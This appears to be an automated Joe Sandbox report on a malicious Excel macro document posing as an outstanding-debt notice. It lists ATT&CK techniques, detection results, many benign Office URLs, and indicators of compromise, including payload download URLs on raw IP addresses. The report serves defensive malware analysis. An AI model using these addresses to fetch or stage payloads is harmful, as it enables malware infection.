Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-610716193-05042021.xlsm2%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://185.183.99.115/44313,6048108796.dat0%Avira URL Cloudsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://51.89.73.159/44313,6048108796.dat0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.183.99.115/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown
http://51.89.73.159/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
    high
    https://login.microsoftonline.com/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
      high
      https://shell.suite.office.com:144316773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
          high
          https://autodiscover-s.outlook.com/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
              high
              https://cdn.entity.16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                    high
                    https://powerlift.acompli.net16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v116773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                      high
                      https://cortana.ai16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                high
                                https://api.aadrm.com/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                      high
                                      https://cr.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                            high
                                            https://graph.ppe.windows.net16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                            high
                                                            https://graph.windows.net16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                high
                                                                                                https://api.office.net16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v216773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.16773A9D-D37D-4540-9494-50C371665E6B.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                185.183.99.115
                                                                                                                                                unknownNetherlands
                                                                                                                                                60117HSAEfalse
                                                                                                                                                51.89.73.159
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                190.14.37.38
                                                                                                                                                unknownPanama
                                                                                                                                                52469OffshoreRacksSAPAfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:404168
                                                                                                                                                Start date:04.05.2021
                                                                                                                                                Start time:19:18:57
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 4m 57s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Outstanding-Debt-610716193-05042021.xlsm
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:23
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal60.expl.evad.winXLSM@1/9@0/3
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 92.122.145.220, 52.109.32.63, 52.109.8.24, 52.109.12.21, 184.30.24.56, 20.82.210.154, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 20.54.26.129
                                                                                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations
